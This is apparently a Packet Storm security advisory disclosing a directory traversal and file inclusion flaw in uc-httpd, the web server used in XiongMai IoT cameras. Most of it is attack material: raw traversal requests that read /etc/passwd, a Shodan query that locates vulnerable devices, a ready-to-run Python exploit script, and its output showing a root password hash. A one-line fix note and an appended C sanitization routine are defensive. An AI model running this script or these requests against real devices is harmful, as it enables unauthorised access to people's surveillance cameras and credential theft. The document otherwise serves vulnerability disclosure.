
uc-httpd Local File Inclusion / Traversal

31 May 2017 | Reported by: keksec | Type: packetstorm | Source: packetstormsecurity.com

uc-httpd Vulnerability, LFI, Directory Traversa

Code
`PROJECT INSECURITY  
  
[+]---------------------------------------------------------[+]  
| Vulnerable Software: uc-httpd |  
| Vendor: XiongMai Technologies |  
| Vulnerability Type: LFI, Directory Traversal |  
| Date Released: 03/04/2017 |  
| Released by: keksec |  
[+]---------------------------------------------------------[+]  
  
uc-httpd is an HTTP daemon used by a wide array of IoT devices (primarily security cameras). It is vulnerable  
to local file inclusion and directory traversal bugs. There are a few million total vulnerable devices, with  
around one million vulnerable surveillance cameras.  
  
The following request can be made to display the contents of the 'passwd' file:  
GET ../../../../../etc/passwd HTTP/1.0  
  
To display a directory listing, the following request can be made:  
GET ../../../../../var/www/html/ HTTP/1.0  
The above request would output the contents of the webroot directory as if the 'ls' command had been executed.  
  
The following Shodan query can be used to display vulnerable systems:  
product:uc-httpd  
  
Here is a proof of concept (written by @sxcurity):  
-------------------------------------------------------------------------------------------------------------  
'''  
#!/usr/bin/env python  
import urllib2, httplib, sys  
  
httplib.HTTPConnection._http_vsn = 10  
httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'  
  
print "[+] uc-httpd 0day exploiter [+]"  
print "[+] usage: python " + __file__ + " http://<target_ip>"  
  
host = sys.argv[1]  
fd = raw_input('[+] File or Directory: ')  
  
print "Exploiting....."  
print '\n'  
print urllib2.urlopen(host + '/../../../../..' + fd).read()  
  
'''  
-------------------------------------------------------------------------------------------------------------  
  
Here is a live example of the exploit being run:  
  
  
root@127:~/dongs# python pwn.py http://127.0.0.1  
[+] uc-httpd 0day exploiter [+]  
[+] usage: python pwn.py http://<target_ip>  
[+] File or Directory: /etc/passwd  
Exploiting.....  
  
  
root:absxcfbgXtb3o:0:0:root:/:/bin/sh  
  
root@127:~/dongs# python pwn.py http://127.0.0.1  
[+] uc-httpd 0day exploiter [+]  
[+] usage: python pwn.py http://<target_ip>  
[+] File or Directory: /proc/version  
Exploiting.....  
  
  
Linux version 3.0.8 ([email protected]) (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.32.1+eabi+linuxpthread)) ) #52 Fri Apr 22 12:33:57 CST 2016  
  
root@127:~/dongs#  
-------------------------------------------------------------------------------------------------------------  
  
  
How to fix: Sanitize inputs, don't run your httpd as root!  
  
[+]---------------------------------------------------------[+]  
| CONTACT US: |  
| |  
| IRC: irc.insecurity.zone (6667/6697) #insecurity |  
| Twitter: @insecurity |  
| Website: insecurity.zone |  
[+]---------------------------------------------------------[+]  
`
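
The "sanitize inputs" fix named above, sketched as an added example (not part of the original advisory and not the vendor's code): a C routine that maps a request target onto a webroot and refuses anything that would leave it, including the request forms shown in the advisory. The name `resolve_target` is hypothetical, and the webroot is assumed to be an absolute path without a trailing slash.

```c
#include <stddef.h>
#include <string.h>
/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Hypothetical helper: map an HTTP request target to a path under webroot.
 * Returns 0 and fills out on success, -1 if the request must be refused. */
int resolve_target(const char *webroot, const char *target,
                   char *out, size_t outlen) {
    char dec[512];
    size_t n = 0, base = strlen(webroot), len = base;
    if (target[0] != '/') return -1;   /* refuses "GET ../../etc/passwd" */
    for (const char *p = target; *p && *p != '?'; p++) {
        int c = (unsigned char)*p;
        if (c == '%') {                /* percent-decode exactly once */
            int hi = hexval((unsigned char)p[1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)p[2]);
            if (lo < 0) return -1;
            c = hi * 16 + lo; p += 2;
        }
        if (c == 0 || c == '\\' || n + 1 >= sizeof dec) return -1;
        dec[n++] = (char)c;
    }
    dec[n] = '\0';

    if (base + 1 > outlen) return -1;
    memcpy(out, webroot, base + 1);
    for (const char *seg = dec; *seg; ) {
        size_t sl = strcspn(seg, "/");
        if (sl == 2 && seg[0] == '.' && seg[1] == '.') {
            if (len == base) return -1;        /* would climb above webroot */
            while (out[--len] != '/') { }      /* drop the last segment */
            out[len] = '\0';
        } else if (sl > 0 && !(sl == 1 && seg[0] == '.')) {
            if (len + sl + 2 > outlen) return -1;
            out[len++] = '/';
            memcpy(out + len, seg, sl);
            out[len += sl] = '\0';
        }
        seg += sl;
        if (*seg == '/') seg++;
    }
    return 0;
}
```

This check is purely lexical, so a symlink inside the webroot can still point outside it; confirming the opened path with `realpath()` and dropping root privileges after binding the listening socket covers the second half of the advisory's fix.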
